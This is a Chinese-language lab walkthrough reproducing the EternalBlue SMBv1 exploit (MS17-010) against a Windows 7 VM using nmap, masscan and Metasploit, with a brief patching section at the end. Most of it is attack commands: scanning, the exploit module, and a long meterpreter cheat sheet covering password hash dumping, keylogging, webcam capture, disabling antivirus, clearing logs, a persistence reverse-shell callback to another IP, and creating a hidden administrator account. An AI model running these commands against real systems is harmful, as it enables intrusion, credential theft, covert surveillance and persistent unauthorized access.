目錄
-
- 0x01 漏洞介紹
- 0x02 環境部署:
- 0x03 漏洞複現
-
-
- 1. 資訊收集:
- 2. 使用Metasploit進行測試漏洞
- 3. 漏洞利用
-
- 0x04 漏洞修複
0x01 漏洞介紹
-
漏洞描述
Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠端代碼執行漏洞,惡意代碼會掃描開放445檔案共享端口的Windows機器,無需使用者任何操作,隻要開機上網,不法分子就能在電腦和伺服器中植入勒索軟體、遠端控制木馬、虛拟貨币挖礦機等惡意程式。
SMB服務在Windows與UNIX系列OS之間搭起一座橋梁,讓兩者的資源可互通有無。
-
漏洞編号
CVE-2017-0143
CVE-2017-0144
CVE-2017-0145
CVE-2017-0146
CVE-2017-0148
-
受影響版本
已知受影響的Windows 版本包括但不限于
WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
這裡列舉的這些,但還
0x02 環境部署:
kali 【攻擊機】 ip:192.168.30.182
win7 【受害機】 ip:192.168.30.203
實驗中需要關閉win7防火牆
0x03 漏洞複現
1. 資訊收集:
1.1主機發現
nmap -sn 192.168.30.0/24
1.2 端口掃描
masscan --rate=10000 --ports 0-65535 192.168.30.203
發現主機開放139,445端口
1.3 詳細掃描
nmap -T4 -sV -O -p 445,139 192.168.30.203
2. 使用Metasploit進行測試漏洞
2.1 開啟metasploit
2.2 選中使用子產品
use auxiliary/scanner/smb/smb_ms17_010
2.3 檢視選項,并設定參數
2.4 運作
發現該目标主機存在MS17-010漏洞
3. 漏洞利用
3.1 選中子產品
use exploit/windows/smb/ms17_010_eternalblue
3.2檢視選項,設定參數
3.3運作,拿到shell
在meterpreter > 中我們可以使用以下的指令來實作對目标的操作
sysinfo #檢視目标主機系統資訊
run scraper #檢視目标主機詳細資訊
run hashdump #導出密碼的哈希
load kiwi #加載
ps #檢視目标主機程序資訊
pwd #檢視目标目前目錄(windows)
getlwd #檢視目标目前目錄(Linux)
search -f *.jsp -d e:\ #搜尋E盤中所有以.jsp為字尾的檔案
download e:\test.txt /root #将目标機的e:\test.txt檔案下載下傳到/root目錄下
upload /root/test.txt d:\test #将/root/test.txt上傳到目标機的 d:\test\ 目錄下getpid #檢視目前Meterpreter Shell的程序
PIDmigrate 1384 #将目前Meterpreter Shell的程序遷移到PID為1384的程序上
idletime #檢視主機運作時間
getuid #檢視擷取的目前權限
getsystem #提權
run killav #關閉防毒軟體
screenshot #截圖
webcam_list #檢視目标主機的攝像頭
webcam_snap #拍照
webcam_stream #開視訊
execute 參數 -f 可執行檔案 #執行可執行程式
run getgui -u hack -p 123 #建立hack使用者,密碼為123
run getgui -e #開啟遠端桌面
keyscan_start #開啟鍵盤記錄功能
keyscan_dump #顯示捕捉到的鍵盤記錄資訊
keyscan_stop #停止鍵盤記錄功能
uictl disable keyboard #禁止目标使用鍵盤
uictl enable keyboard #允許目标使用鍵盤
uictl disable mouse #禁止目标使用滑鼠
uictl enable mouse #允許目标使用滑鼠
load #使用擴充庫
run #使用擴充庫
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反彈時間間隔是5s 會自動連接配接
192.168.27的4444端口,缺點是容易被防毒軟體清除
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口轉發到本地的3389端口上,這裡的192.168.11.13是擷取權限的主機的ip位址
clearev #清除日志
- 創将一個新使用者,并添加至管理者組
#建立一個使用者
net user hack 123456 /add
#将使用者hack添加至管理者組
net localgroup administrators hack /add
#檢視目前管理者組成員
net localgroup administrators
0x04 漏洞修複
- 關閉139與445端口。
- 打開防火牆,安裝安全軟體。
- 線上更新;開啟Windows Update更新。
- 打更新檔;此漏洞對應的微軟更新檔位址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010